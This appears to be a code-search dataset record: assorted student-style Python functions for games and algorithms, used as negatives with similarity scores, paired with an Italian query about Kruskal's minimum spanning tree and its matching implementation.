mal_ubicado = \"si\"\n #validacion para que los barcos no queden contiguos entre otros ya posicionados\n elif (ubicacion[0] == x[0] or (ubicacion[0]+1) == x[0] or (ubicacion[0]-1) == x[0]) and ((ubicacion[1]) == x[1] or (ubicacion[1]+1) == x[1] or (ubicacion[1]- 1) == x[1]): \n mal_ubicado = \"si\"\n if mal_ubicado == \"no\":\n cantidad -= 1 #se resta uno a la cantidad de los barcos porque ya este se posiciono correctamente\n lista_ubicacion_barco.append(ubicacion) #si el barco no es contiguo con ningun otro barco se agrega a la lista de los barcos ya posicionados\n elif mal_ubicado == \"si\":\n cantidad = cantidad #la cantidad de barcos se mantiene igual porque el barco quedo contiguo a otro, se repite el proceso d eubicacion para este barco", "def transact(self):", "def transact(self):", "def colocar_especial(tablero_juego, filas, columnas, especiales_nivel, datos_de_especiales, obstaculos, posicion_fruta, posicion_serpiente):\n color_normal = '\\033[0m'\n color_azul = '\\033[34m'\n especial_colocado = choice(especiales_nivel)\n especial = datos_de_especiales[especial_colocado]\n while True:\n posicion_especial = [randint(0, filas-1), randint(0, columnas-1)]\n if not any((esta_contenido_o_igual(posicion_especial, obstaculos), \n esta_contenido_o_igual(posicion_especial, posicion_serpiente), \n esta_contenido_o_igual(posicion_especial, posicion_fruta))): break\n tablero_juego[posicion_especial[0]][posicion_especial[1]] = color_azul + especial_colocado + color_normal\n return posicion_especial, especial_colocado", "def joueCoup(position,coup):\n nouvelle_pos = clonePosition(position) # on duplique pour ne pas modifier l'original\n n = nouvelle_pos['taille']\n trait = nouvelle_pos['trait']\n # on transforme coup en indice\n if trait == 'SUD':\n indice_depart = coup-1\n else:\n indice_depart = 2*n-coup\n # retrait des graines de la case de depart\n nbGraines = nouvelle_pos['tablier'][indice_depart]\n nouvelle_pos['tablier'][indice_depart] = 0\n # on seme les graines dans les cases a partir de celle de depart\n indice_courant = indice_depart\n while nbGraines > 0:\n indice_courant = (indice_courant + 1) % (2*n)\n if (indice_courant != indice_depart): # si ce n'est pas la case de depart\n nouvelle_pos['tablier'][indice_courant] += 1 # on seme une graine\n nbGraines -= 1\n # la case d'arrivee est dans le camp ennemi ?\n if (trait == 'NORD'):\n estChezEnnemi = (indice_courant < n)\n else:\n estChezEnnemi = (indice_courant >= n)\n # realisation des prises eventuelles\n while estChezEnnemi and (nouvelle_pos['tablier'][indice_courant] in range(2,4)):\n nouvelle_pos['graines'][trait] += nouvelle_pos['tablier'][indice_courant]\n nouvelle_pos['tablier'][indice_courant] = 0\n indice_courant = (indice_courant - 1) % (2*n)\n if (trait == 'NORD'):\n estChezEnnemi = (indice_courant < n)\n else:\n estChezEnnemi = (indice_courant >= n)\n # mise a jour du camp au trait\n if trait == 'SUD':\n nouvelle_pos['trait'] = 'NORD'\n else:\n nouvelle_pos['trait'] = 'SUD'\n return nouvelle_pos", "def placaLliure():\n lliures = []\n con = lite.connect('parking.db')\n cur = con.cursor()\n try:\n cur.execute(\"SELECT placa FROM parking ORDER BY placa ASC\")\n rows = cur.fetchall()\n for row in rows:\n lliures.append(row[0])\n print lliures\n for i in range(1,len(lliures)+1):\n if i != lliures[i-1]:\n result= i\n break\n except lite.IntegrityError:\n pass\n con.close()\n return result", "def complete(self): #lol\n self.fix_rotation()\n return self", "def __init__(self):\n mi_parqueo = list()", "def classificar(self, referencia):\n distancia_minima = distancia_euclidiana(referencia, self.lista[0][0], 3)\n posicao = [0,0]\n\n for y in range(self.altura):\n for x in range(self.largura):\n distancia = distancia_euclidiana(referencia, self.lista[x][y], 3)\n if distancia < distancia_minima:\n distancia_minima = distancia\n posicao = [x,y]\n\n return posicao", "def atender(self):\n\n if self.enfila>0:\n \n self.enfila-=1\n self.fila.pop(0)", "def test_obtener_lista_ciudades_transformadas_vacia(self):\n lista = []\n lista_transformada = CIUDADES_CONTROLLER.obtenerListaCiudades(lista)\n self.assertEqual(len(lista_transformada), len(lista))", "def resoudre(self):\n #crée la root du noeud\n #collections.deque est un conteneur comme une liste qui permet\n # des ajouts et des retraits rapides à chaque extremité\n queue = collections.deque([Node(self.start)])\n #vu représente les noeuds déjà croisés\n vu = set()\n vu.add(queue[0].state)\n while queue:\n #le noeud qui ressort dépend du score (h+g vu précédemment),\n queue = collections.deque(sorted(list(queue), key=lambda node: node.f))\n # on prend le score le plus faible pour se rapprocher du but avec un score de 0\n node = queue.popleft()\n #on vérifie s'il est égal à l'état du but c'est à dire le taquin = [1,2,3,4,5,6,7,8,0]\n if node.resolu:\n return node.chemin\n\n #si ce n'est pas l'état du but on regarde les différents noeuds enfants possibles\n # en faisant toutes les directions ( haut, bas, gauche, droite)\n for deplacement, action in node.actions:\n child = Node(deplacement(), node, action)\n\n if child.state not in vu:\n #on ajoute le noeud enfant à la queue\n queue.appendleft(child)\n vu.add(child.state)", "def composantesConnexes(modele):\n \n num_composantes = {}\n liste_sommets = modele.getListeSommets()\n compteur_comp = 1\n \n for x in liste_sommets :\n # si x n'a pas de numéro, lancer un parcours...\n if x not in num_composantes :\n attente = deque([x])\n num_composantes[x] = compteur_comp\n modele.addTexte(x,compteur_comp)\n while attente:\n courant = attente.pop()\n for vois in modele.getVoisins(courant):\n if not vois in num_composantes:\n attente.append(vois)\n num_composantes[vois] = compteur_comp\n modele.addTexte(vois,compteur_comp)\n \n compteur_comp += 1\n modele.observateur.update()", "def mejor_ajuste(memoria, procesos):\n\n no_colocados = [] # Procesos que no se pudieron colocar en la memoria\n\n for proc in procesos:\n exito = False\n menor_desperdicio = None # Posición de la partición que produce menor\n # desperdicio.\n \n for part in memoria:\n if part[1] == None and part[0] >= proc[1]:\n if menor_desperdicio == None:\n menor_desperdicio = memoria.index(part)\n elif part[0] - proc[1] < memoria[menor_desperdicio][0] - proc[1]:\n menor_desperdicio = memoria.index(part)\n\n exito = True\n\n if exito:\n memoria[menor_desperdicio][1] = proc[0]\n else:\n no_colocados.append(proc[0])\n\n return memoria, no_colocados", "def agregar_bolsa(self, letra, cantidad):", "def uniformCostSearch(problem):\n #Teremos uma fila só que cada elemento da fila recebe uma prioridade como uma fila de banco\n \"*** YOUR CODE HERE ***\"\n marcado = set()\n fila = util.PriorityQueue()\n fila.push((problem.getStartState(), []),0)\n while not fila.isEmpty():\n pos, movimento = fila.pop()\n if problem.isGoalState(pos):\n return movimento\n if pos in marcado:\n continue\n marcado.add(pos)\n candidatos = problem.getSuccessors(pos)\n for candidato, acao, custo in candidatos: #agora adicionaremos a prioridade no push\n prioridade_do_candidato = problem.getCostOfActions(movimento+[acao])\n print(prioridade_do_candidato)\n fila.push((candidato, movimento + [acao]), prioridade_do_candidato)\n\n return []", "def atencion_ingreso(self, camion):\r\n\r\n operaciones = self.operaciones[\"Operaciones complementarias\"]\r\n\r\n if camion.tipo == \"Descarga\":\r\n yield self.process(operaciones[\"Atencion recepcion 1\"]\r\n .ejecutar(self, camion))\r\n else:\r\n yield self.process(operaciones[\"Atencion despacho 1\"]\r\n .ejecutar(self, camion))\r\n\r\n if camion.carga not in [\"Contenedor 20\", \"Contenedor 40\"] and \\\r\n not (camion.tipo == \"Carga\" and camion.carga == \"Harina de Soya - Hi Pro/Pellet de Soya\"):\r\n yield self.process(operaciones[\"Primer pesaje\"]\r\n .ejecutar(self, camion))\r\n self.exit(camion.nombre)", "def getNext(self):", "def setSeqElementWaiting(self,SequenceIndex=1,State=1):#TODO implement stringonly\n\n if (State!=0):\n self.sendMessage(\"SEQuence:ELEMent\"+str(SequenceIndex)+\":TWAit 1\")\n else:\n self.sendMessage(\"SEQuence:ELEMent\"+str(SequenceIndex)+\":TWAit 0\")", "def __init__(self):\n\n self.sequence = []", "def test_CONT_pass(self):\n for O in self.mod.objts.itervalues():\n for C in O.conts.itervalues():\n self.assertTrue(C.isset)", "def finTour(self):\n print(\"fin du tour\")\n self.etat = \"Fin\"\n if self.joueurActif.nbRessource + self.joueurActif.getNbRessourceTour() <= self.joueurActif.nbMaxRessource :\n self.joueurActif.nbRessource += self.joueurActif.getNbRessourceTour()\n else:\n self.joueurActif.nbRessource = self.joueurActif.nbMaxRessource\n print(self.joueurActif.nbRessource)\n if self.joueurActif == self.joueur1:\n self.joueurActif = self.joueur2\n print(\"Au joueur 2 de jouer\")\n else:\n self.joueurActif = self.joueur1\n print(\"Au joueur 1 de jouer\")\n for iEntite in self.joueurActif.entiteResetDeplacement:\n iEntite.setMoove(True)\n for iEntite in self.joueurActif.entiteResetCombat:\n iEntite.setCanAttack(True)\n \n if self.joueur1.nbRessource >= 2000:\n print(\"FIN DE LA PARTIE LE JOUEUR 1 A GAGNER\")\n if self.joueur2.nbRessource >= 2000:\n print(\"FIN DE LA PARTIE LE JOUEUR 2 A GAGNER\") \n \n self.etat = \"En jeu\"", "def done(self):", "def done(self):", "def cont(self):\n return True", "def get_next_if_any(self):\n try:\n ret = self.work[deepcopy(self.i)]\n self.i += 1\n # print \"Trickling item\", self.i\n return ret\n except Exception:\n return None", "def es_satisfecho_por(self, candidata):", "def esta_abierta(self):\r\n self.actualizar_estado_actividad()\r\n return self.estado != 'Cerrada'", "def task3(self):\n\n pass", "def main():\n\n # on affiche la liste des cartes disponibles\n liste_des_cartes = functions.liste_cartes() + functions.liste_sauvegardes()\n functions.afficher_liste(liste_des_cartes)\n\n # selection d'une carte, un retour \"None\" indique une mauvaise saisie\n while True:\n choix = functions.choix_carte(\n input('''Indiquez le numéro de la carte choisie.\n Attention, si vous choisissez une nouvelle partie, la sauvegarde associée\n à la carte concernée sera remplacée. \\n'''), liste_des_cartes)\n if choix is not None:\n break\n\n # la carte est choisie, on peut générer un Labyrinthe\n laby = Labyrinthe(choix)\n # on affiche le tracé du labyrinthe\n print(laby.carte)\n\n # on lance la boucle du jeu\n while True:\n deplacements = input(\"\"\"Dans quelle direction voulez vous aller?\n \"E\" pour aller vers l'est, \"N\" pour aller vers le nord\n \"S\" pour aller vers le sud, \"O\" pour aller vers l'ouest\n Suivi d'un nombre (optionnel) pour le nombre de cases à parcourir\n \"Q\" pour sauvegarder et quitter\n \"\"\")\n # on vérifie que les données entrées par l'utilisateur sont valides\n instructions = functions.instructions_valide(deplacements)\n if instructions is not None:\n\n if instructions == \"quitter\":\n laby.sauvegarder_partie()\n break\n if instructions == \"lettre non valide\":\n print(\"La lettre entrée n'est pas valide \\n\")\n continue\n if instructions == \"non valide\":\n print(\"Les données entrées ne sont pas valides \\n\")\n continue\n else:\n # on vérifie si la partie est toujours active\n partie_en_cours = laby.effectuer_deplacements(instructions)\n if not partie_en_cours:\n # en cas de sortie trouvée, on supprime la sauvegarde\n laby.supprimer_partie()\n print(\"Partie terminée, sauvegarde supprimée\")\n break\n\n # On met en pause le système (Windows)\n os.system(\"pause\")", "def abrir(self):\n assert self.open == False\n self.ne = [n for n in self.ne]\n self.je = [e1 for e1 in self.je]\n self.ie = []\n self.open = True", "def _is_finish(self, pos):\r\n return self.course[pos[0], pos[1]] == 2", "def lateral_vazio_8(tab, jog):\r\n for x in [2,4,6,8]:\r\n if eh_posicao_livre(tab,x):\r\n return x", "def start(self):\n\n self.ihm.log(['On attaque la boucle infinie'])\n\n while 1:\n\n # 1. afficher le jeu\n self.ihm.afficherJeu()\n\n if self.ihm.utilisateurQuitte(): self.stop()\n\n # 2. attendre un mouvement\n # 3. IHM nous file la direction\n mouv = self.ihm.mouvement()\n\n if self.ihm.utilisateurQuitte(): self.stop()\n\n # 4. on demande à la map si c'est OK\n # 5. on fait buoger le joueur si OK\n\n #juste pour faciliter l'accès\n x = self.joueur.x\n y = self.joueur.y\n if mouv == \"haut\":\n if self.map.case_libre(x, y-1):\n self.joueur.haut()\n else: continue\n elif mouv == \"droite\":\n if self.map.case_libre(x+1, y):\n self.joueur.droite()\n else: continue\n elif mouv == \"bas\":\n if self.map.case_libre(x, y+1):\n self.joueur.bas()\n else: continue\n elif mouv == \"gauche\":\n if self.map.case_libre(x-1, y):\n self.joueur.gauche()\n else: continue\n else:\n pass # quitter le jeu\n\n # on retire 1 au compteur de pas\n self.pas_pour_monstre -= 1\n\n # 6.1. monstre ?\n if not self.pas_pour_monstre:\n self.ihm.log([\"C'est l'heure du monstre\"])\n\n # 7.1. on l'instancie\n monstre = self.spawn_monstre()\n\n # 8.1. on génère un combat\n combat = Combat(self.joueur, monstre)\n\n # 9.1. on refourgue le combat à l'ihm qui affiche un dialog\n if self.ihm.utilisateurQuitte(): self.stop()\n choix_combat = self.ihm.dialogCombat(combat)\n if choix_combat == 'combattre':\n combat.combat()\n else:\n combat.fuite()\n\n self.ihm.finCombat(combat)\n if self.ihm.utilisateurQuitte(): self.stop()\n self.reinit_pas()\n\n # 6.2. objet ?\n # 7.2. on le récupère/on l'instancie\n # 8.2. on le refourgue à l'IHM qui affiche un dialog\n # 9.2. l'user répond et on prend en compte son choix\n self.ihm.log([\"Checks pour les objets\"])\n if self.ihm.utilisateurQuitte(): self.stop()\n self.objet_trouve()", "def update(self):\n\n # Ordenamos los personajes por fila, para luego dibujarlos correctamente. Para que no se solapen.\n self._personajes.sort(self._comparar_coordenadas_personajes)\n\n for personaje in self._personajes:\n if (personaje.andando): # Si está andando.\n # Si el personaje se encuentra en el centro de la celda a donde debia llegar ...\n if (personaje.obtener_coordenadas() == self._mapa.obtener_coordenadas_por_posicion((personaje.camino[0][0], personaje.camino[0][1]),self._mapa.CENTER)): \n del personaje.camino[:1] # Eliminamos esa celda del camino ha seguir porque ya ha llegado a ella. \n if ((personaje.camino == []) or (personaje.camino == None)): # Si ya no queda camino a seguir...\n personaje.parar() # Paramos al Personaje.\n if not(personaje.accion == None): # Si tiene asignada alguna acción después de haber llegado a su destino ...\n personaje.accion() # Ejecutamos la acción\n personaje.accion = None # Y limpiamos la acción\n if (personaje.nombre != \"Jugador\"): # Si el Personaje no es el Jugador establacemos su dirección final.\n personaje.actualizar_direccion(personaje.direccion_final)\n else: # Calculamos la nueva direccion hacia donde tiene que mover\n # Obtenemos la fila y columna donde se encuenta el personaje.\n origen = self._mapa.obtener_posicion_por_coordenadas(personaje.obtener_coordenadas())\n # Establecemos hacia donde tiene que mirar el Personaje para ir en esa dirección.\n personaje.actualizar_direccion(self._mapa.direcciones.index([personaje.camino[0][0] - origen[0], personaje.camino[0][1] - origen[1]]))\n else: # Si el personaje no esa todavia en el centro de la celda \n if (not self._hay_colision(personaje, (personaje.camino[0][0], personaje.camino[0][1]))): # Si no hay colisión en la celda de destino \n personaje.mover(personaje.obtener_direccion()) # Movemos al personaje en esa dirección.\n else: # Si hay colision\n celda_personaje = self._mapa.obtener_posicion_por_coordenadas(personaje.obtener_coordenadas())\n personaje.actualizar_posicion(self._mapa.obtener_coordenadas_por_posicion((celda_personaje[0], celda_personaje[1]),self._mapa.CENTER))\n # Volvermos a calcular una ruta para llegar al destino.\n self.ir_a(personaje, personaje.destino, personaje.direccion_final)\n \n personaje.update() # Actualizamos el personaje.\n \n for objeto in self._objetos: # Actualizamos los objetos.\n objeto.update()\n \n self._dibujar(\n )", "def _get_sequence(self, cursor):\n raise NotImplementedError", "def juego():\n ubicar_naves()\n global disparos_acertados, disparos_efectuados, disparos_elegidos, disparos_fallidos, disparos_repetidos\n #contadores\n disparos_efectuados = 0\n disparos_acertados = 0\n disparos_fallidos = 0\n disparos_repetidos = 0\n puntaje = 0\n for x in usuario_partida:\n usuario = x\n print(\"¿Estas listo para jugar {}? eso espero porque no hay vuelta atras\\nCargando........ :/\\n\".format(usuario))\n sleep(3)\n print(\"Mi flota esta compuesta por \\n- {} \\n- {} \\n- {}\\n Preparate para empezar\\n\".format(Portaviones.caracteristicas(Portaviones), Fragata.caracteristicas(Fragata), Submarinos.caracteristicas(Submarinos)))\n sleep(3)\n mostrar_tablero(tablero)\n while len(lista_ubicacion_barco) > 0:\n while True: #validacion para la fila ingresada por el usuario\n try:\n elegir_fila = int(input(\"Ingresa una fila: \"))\n if elegir_fila < 1 or (elegir_fila >10 and elegir_fila != 24):\n raise ValueError\n break\n except ValueError:\n print(\"{}No existe dicha fila{}\".format(Fore.LIGHTRED_EX, Fore.RESET))\n while True: #validacion para la columna ingresada por el usuario\n try:\n elegir_columna = int(input(\"Ingresa una columna: \"))\n if elegir_columna < 1 or (elegir_columna >10):\n raise ValueError\n break\n except ValueError:\n print(\"{}No existe dicha columna{}\".format(Fore.LIGHTRED_EX, Fore.RESET))\n tiro_elegido = (elegir_fila, elegir_columna) #cada tiro se almacena en una lista\n if tiro_elegido[0] == 24:\n print(\"Has accedido a un cheat code, los barcos estan en: \",lista_ubicacion_barco)\n elif tiro_elegido in disparos_elegidos: #si la coordenada ingresada por el usuario ya la ingreso anteriormente, quedo guardada en la lista y no le va a contar como disparo efectuadao\n print(\"Este disparo ya lo has hecho antes :|\")\n disparos_repetidos += 1 \n elif tiro_elegido in lista_ubicacion_barco:\n disparos_elegidos.append(tiro_elegido)\n print(\"Has acertado\\n\")\n tablero[elegir_fila - 1][elegir_columna - 1] = \"{}F{}\".format(Fore.RED, Fore.RESET) #se remplaza la coordenada acertada por una F roja\n lista_ubicacion_barco.remove(tiro_elegido) #se quita la posicion del barco de la lista general donde estan todas las ubicaciones\n disparos_efectuados += 1\n disparos_acertados += 1\n puntaje += 10\n #se verifica si la coordenada ingresada pertenece a alguna coordenada almacenada en las listas de cada barco y se elimina\n #cuando una lista este vacia muestra un mensaje que ha hundido a la nave especificaa\n if tiro_elegido in coordenadas_portaviones: \n coordenadas_portaviones.remove(tiro_elegido) \n if len(coordenadas_portaviones) == 0:\n print(\"Felicitaciones has hundido el portaviones, su ataque aereo quedo neutralizado\\n\")\n elif tiro_elegido in coordenadas_fragata:\n coordenadas_fragata.remove(tiro_elegido)\n if len(coordenadas_fragata) == 0:\n print(\"Felicitaciones has hundido la Fragata, su comunicacion con tierra ha sido detenida\\n\")\n elif tiro_elegido in coordenadas_submarinos:\n coordenadas_submarinos.remove(tiro_elegido)\n if len(coordenadas_submarinos) == 0:\n print(\"Felicitaciones has hundido los submarinos\\n\")\n else:\n disparos_elegidos.append(tiro_elegido)\n print(\"Has fallado\\n\")\n tablero[elegir_fila - 1][elegir_columna - 1] = \"{}X{}\".format(Fore.BLUE, Fore.RESET) #se remplaza la coordenada errada por una X azul\n disparos_efectuados += 1\n disparos_fallidos += 1\n puntaje -= 2\n mostrar_tablero(tablero)\n disparos_elegidos.clear()\n print(\"{}Ese disparo me ha dolido.{} Has logrado hundir toda mi flota :(\".format(Fore.RED, Fore.RESET))\n sleep(1)\n if disparos_efectuados == 9:\n print(\"¿Eres un robot? lo que acabas de hacer es poco probable... ¿viste los cheat codes verdad?\")\n elif disparos_efectuados < 45:\n print(\"Excelente estrategia\")\n elif disparos_efectuados >= 45 and disparos_efectuados <= 70:\n print(\"Buena estrategia, pero hay que mejorar(o buscar los cheat codes)\")\n elif disparos_efectuados > 70:\n print(\"{}Considérese Perdedor, tiene que mejorar{}\".format(Fore.RED, Fore.RESET))\n print(\"\\nCargando tus estadisticas :| .......... pssss deberias probar el numero de kobe en fila\\n\")\n sleep(2.5)\n for x in usuario_partida: #usuario_partida almacena el usuario de cada partida, se borra la lista cuando se ingresa otro jugador\n print(\"{}{} tus estadisticas fueron las siguientes:{}\".format(Fore.YELLOW,x, Fore.RESET))\n print(\"Disparos realizados = {}\".format(disparos_efectuados))\n print(\"Puntaje total = {}\".format(puntaje))\n print(\"Disparos repetidos = {}\".format(disparos_repetidos))\n print(\"Tu tablero quedo asi:\")\n mostrar_tablero(tablero)\n #se agregaran los puntajes y disparos del usuario a la base de datos en el txt\n for x in usuario_partida:\n y = x\n with open(\"Basedatos.txt\", \"r\") as bd:\n punto = []\n datos = bd.readlines()\n nuevo_valor = \"\"\n for x in datos:\n if y in x:\n index = datos.index(x)\n puntos = x[:-1].split(\",\")\n if int(puntos[4]) < puntaje: #si el usuario ya tiene un puntaje se va a almacenar en el txt el que sea mayor (puede ser el viejo o el que acaba de obtener)\n puntos[4] = \" {}\".format(puntaje)\n if int(puntos[5]) > disparos_efectuados: #si el usuario ya ha jugado se va a almacenar en el txt la menor cantidad de disparos que haya obtenido \n puntos[5] = \" {}\".format(disparos_efectuados)\n for x in range(len(puntos)):\n if x != len(puntos) - 1:\n nuevo_valor += puntos[x] + \",\"\n else:\n nuevo_valor += puntos[x] + \"\\n\"\n datos[index] = nuevo_valor\n with open(\"Basedatos.txt\", \"w\") as bd: #se reescribira el txt con los datos del usuario que jugo la partida actualizados\n bd.writelines(datos)", "def select_new_current_cup(self):\n\n # \"The crab selects a new current cup: the cup which is immediately clockwise of the current cup.\"\n\n current_position = self.cups.index(self.current)\n if current_position < len(self.cups) - 1: # Current cup is not on the end of the list.\n self.current = self.cups[current_position + 1]\n else:\n self.current = self.cups[0]", "def tri_si_rencontre(self, joueurs_tries, liste_rencontres, nb_joueurs):\n # We recover the possibilities\n for x in joueurs_tries:\n liste_dict = []\n for y in joueurs_tries:\n if x == y:\n continue\n if (x, y) in liste_rencontres or (y, x) in liste_rencontres:\n continue\n else:\n liste_dict.append(y)\n self.dict_possiblity[x] = liste_dict\n copy_joueurs = list(joueurs_tries)\n liste_finale = []\n nb_tour = 0\n error = False\n while joueurs_tries:\n x = joueurs_tries[0]\n for y in joueurs_tries:\n if nb_tour > nb_joueurs**2:\n print(\"Il y a une erreur dans l'algorithme.\")\n error = True\n break\n if x == y:\n continue\n if (x, y) in liste_rencontres or (y, x) in liste_rencontres:\n nb_tour += 1\n continue\n else:\n i = 0\n # we are looking for a unique possibility\n for key in list(self.dict_possiblity):\n if len(self.dict_possiblity[key]) == 1:\n valeur = self.dict_possiblity[key][0]\n liste_finale.append((key, valeur))\n liste_rencontres.append((key, valeur))\n joueurs_tries.remove(key)\n joueurs_tries.remove(valeur)\n self.sup_dicti(valeur, key)\n i += 1\n break\n if i > 0:\n break\n # we remove both of the possibilities\n self.sup_dicti(x, y)\n liste_finale.append((x, y))\n liste_rencontres.append((x, y))\n joueurs_tries.remove(y)\n joueurs_tries.remove(x)\n break\n if error:\n liste_finale = Vue().demander_binomes(copy_joueurs,\n nb_joueurs)\n return liste_finale\n return liste_finale", "def processa_compra(self, compra):\n\n print(\"Boleto criado!\\n\" + compra.nota_fiscal)", "def present(self):", "def escolhe_iin_comp(abv): \n \n # Vai ser usado o tuplo que contem todas as informacoes sobre os diferentes tipos de cartao definido nas linhas de codigo iniciais.\n # Sao acedidas as informacoes no indice 1 (Abreviatura), 2 (Digitos iniciais IIN) e 3 (Numero de Digitos). \n \n # Iremos percorrer o tuplo com todas as informacoes sobre os tipos de cartao. Quando se chegar a informacao correspondente a entidade emissora introduzida, escolhemos aleatoriamente os digitos iniciais e o comprimento do cartao.\n \n \n for e in t_cartoes:\n \n if e[1] == abv:\n dig_in = e[2][int(random() * len(e[2]))]\n comp = int(e[3][int(random() * len(e[3]))]) \n \n return (dig_in,comp)", "def acao(self, propriedade):\n if not super(Aleatorio, self).acao(propriedade):\n # Se atende criterio aleatorio\n if random.random() > PROBABILIDADE_DE_COMPRA:\n propriedade.compra(self)", "def test_3(self):\n print(\"Consumir con cedula incorrecta\")\n billetera1=BilleteraElectronica(1,\"Maria\", \"Bra\", 20267824, 1234)\n billetera1.recargar(100, \"20/12/2017\", \"Comercio1\", 20267824)\n self.assertEqual(billetera1.saldo(), 100)\n billetera1.consumir(50, \"22/15/2017\", \"Comercio1\", 20267823, 1234)\n self.assertEqual(billetera1.saldo(), 100)", "def isFirst(self):\n return 1", "def peor_ajuste(memoria, procesos):\n\n no_colocados = [] # Procesos que no se pudieron colocar en la memoria\n\n for proc in procesos:\n exito = False\n mayor_desperdicio = None # Posición de la partición que produce mayor\n # desperdicio.\n \n for part in memoria:\n if part[1] == None and part[0] >= proc[1]:\n if mayor_desperdicio == None:\n mayor_desperdicio = memoria.index(part)\n elif part[0] - proc[1] > memoria[mayor_desperdicio][0] - proc[1]:\n mayor_desperdicio = memoria.index(part)\n\n exito = True\n\n if exito:\n memoria[mayor_desperdicio][1] = proc[0]\n else:\n no_colocados.append(proc[0])\n\n return memoria, no_colocados", "def consome_ped(self):\n tempo = random.randint(1, 3)\n time.sleep(tempo)\n logging.info(\" \".join([\"Cliente\",\n str(self.nome),\n \"bebeu\"]))\n self.gerenciador.espera_beberem()", "def collatz(n):\n if n==1:\n return [n]\n \n if n>1:\n seq = [n]\n while n>1:\n n = collatz_step(n)\n seq.append(n)\n\n if seq[-1]==1:\n return seq" ]
[ "0.5769282", "0.5743955", "0.5429377", "0.53927815", "0.53786826", "0.5377348", "0.5373288", "0.5235085", "0.5226564", "0.5222602", "0.51664275", "0.5165773", "0.51485234", "0.51367635", "0.5131511", "0.5119195", "0.5055059", "0.5043993", "0.5040059", "0.5032709", "0.5030647", "0.5026771", "0.5013764", "0.5003773", "0.49852875", "0.4976012", "0.49631053", "0.4954908", "0.49519232", "0.49508563", "0.4947668", "0.4946034", "0.4938951", "0.49335504", "0.49188146", "0.49073133", "0.48935395", "0.4883605", "0.48755345", "0.48553285", "0.4852679", "0.48505452", "0.48383072", "0.4833301", "0.4828392", "0.4820314", "0.4820314", "0.48196316", "0.4811546", "0.4808415", "0.48077998", "0.48033208", "0.48025358", "0.48015025", "0.47927716", "0.47927716", "0.47881633", "0.4780583", "0.47790706", "0.47754273", "0.47707036", "0.47614545", "0.47555006", "0.4753438", "0.47506005", "0.47496158", "0.47482583", "0.47449094", "0.47430876", "0.4735606", "0.47208318", "0.47070032", "0.47061744", "0.4700492", "0.46959725", "0.4685802", "0.4685802", "0.46814716", "0.4674427", "0.4670305", "0.46695325", "0.4669437", "0.46630642", "0.4662521", "0.4661031", "0.46605605", "0.46571696", "0.46558687", "0.46557933", "0.46549007", "0.46506178", "0.46475846", "0.46470502", "0.4643487", "0.46420506", "0.4635675", "0.46295676", "0.46285632", "0.46283942", "0.4616069", "0.4615258" ]
0.0
-1
Algoritmo di kruskal per la ricerca dell'MST di un grafo, fornito in tramite la sua matrice di adiacenza, usa la funzione ring_finder per cercare anelli nel grafo e di min_nonzero_idx per trovare gli inidici dei rami con costo minimo
def kruskal(m): n = m.shape[0] m_ret = np.zeros([n,n], dtype=int) while np.count_nonzero(m_ret) != 2*(n-1): i_min, j_min = min_nonzero_idx(m) n_min = m[i_min, j_min] m[i_min, j_min], m[j_min, i_min] = 0, 0 m_ret[i_min, j_min], m_ret[j_min, i_min] = n_min, n_min if ring_finder(m_ret, [i_min], []): m_ret[i_min, j_min], m_ret[j_min, i_min] = 0, 0 return m_ret
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def kruskal(self):\n AGM = []\n i = j = 0\n \n self.grafo = sorted(self.grafo,key=lambda item:item[2])\n\n pai = []\n nivel = []\n\n for vertice in range(self.nVer):\n pai.append(vertice)\n nivel.append(0)\n\n while j < self.nVer-1:\n u,v,w = self.grafo[i]\n i+=1\n a = self.findSet(pai,u)\n b = self.findSet(pai,v)\n\n if a!=b:\n j+=1\n AGM.append([u,v,w])\n self.union(a,b,nivel,pai)\n resp = 0\n for u,v,w in AGM:\n resp += w\n print('%.2f' % (resp/100))", "def Kruskal(G): # la fonction prend la liste de edges et de union find\n edges = G.edges\n unionfind_list = G.nodes\n G_k = Graph() # le graph contient le graph de kruskal\n dim = len(unionfind_list) # dimension du nombre de sommet du graph\n kruskal_cost = 0 # initilisation du cout du graphe\n\n sorted_edges = deepcopy(edges)\n sorted_edges.sort() # copy et triage des aretes par cout croissant\n # pour chaque arete on recupere les deux noeuds de leur extremite\n for edge in sorted_edges:\n unionfind_a = edge.get_startnode()\n unionfind_b = edge.get_endnode()\n # s'ils ont deux racines differentes\n if unionfind_a.find() != unionfind_b.find():\n G_k.add_node(unionfind_a)\n G_k.add_node(unionfind_b)\n # on ajoute les deux noeuds et l'arete dans l'arbre de kruskal\n G_k.add_edge(edge)\n # on met a jour le cout\n kruskal_cost += edge.get_vcost()\n unionfind_a.union(unionfind_b)\n # si le nombre d'arete de l'arbre de kruskal est\n # egal au nombre de sommet-1\n # on retourne l'arbre de kruskal et son cout\n if G_k.get_nb_edges() == dim - 1:\n return kruskal_cost, G_k\n return kruskal_cost, G_k", "def find_kx(input_params, search_domain=None, show_progress=False,\r\n grid_points=20, iterations=9, reduction_factor=9,\r\n plot_full_region=True):\r\n w = input_params['w']\r\n d_list = input_params['d_list']\r\n ex_list = input_params['ex_list']\r\n ez_list = input_params['ez_list']\r\n mu_list = input_params['mu_list']\r\n N = len(mu_list)\r\n assert N == len(d_list) == len(ex_list) == len(ez_list)\r\n # error(z) approaches 0 as kx = z approaches a true plasmon mode.\r\n # It's proportional to the determinant of the boundary-condition matrix, \r\n # which equals zero at modes.\r\n def error(kx):\r\n if kx == 0:\r\n return inf\r\n temp_params = input_params.copy()\r\n temp_params['kx'] = kx\r\n should_be_zero = np.linalg.det(bc_matrix(find_kzs(temp_params)))\r\n return should_be_zero / kx**(N+1)\r\n # \"return should_be_zero\" is also OK but has an overall slope that\r\n # makes it harder to find zeros; also, there's a false-positive at k=0.\r\n \r\n # choose the region in which to search for minima. My heuristic is:\r\n # The upper limit of kx should be large enough that\r\n # 2 * pi * i * kzm * d ~ 20 for the thinnest layer we have, or 3 times\r\n # the light-line, whichever is bigger.\r\n if search_domain is None:\r\n kx_re_max = max(max(abs((20 / (2 * pi * d_list[i]))\r\n * cmath.sqrt(ez_list[i] / ex_list[i])) for i in range(1,N)),\r\n 3 * w / nu.c0)\r\n kx_re_min = -kx_re_max\r\n kx_im_min = 0\r\n kx_im_max = abs(kx_re_max)\r\n else:\r\n kx_re_min = search_domain[0]\r\n kx_re_max = search_domain[1]\r\n kx_im_min = search_domain[2]\r\n kx_im_max = search_domain[3]\r\n \r\n # Main part of function: Call find_all_zeros()\r\n kx_list = find_all_zeros(kx_re_min, kx_re_max, kx_im_min, 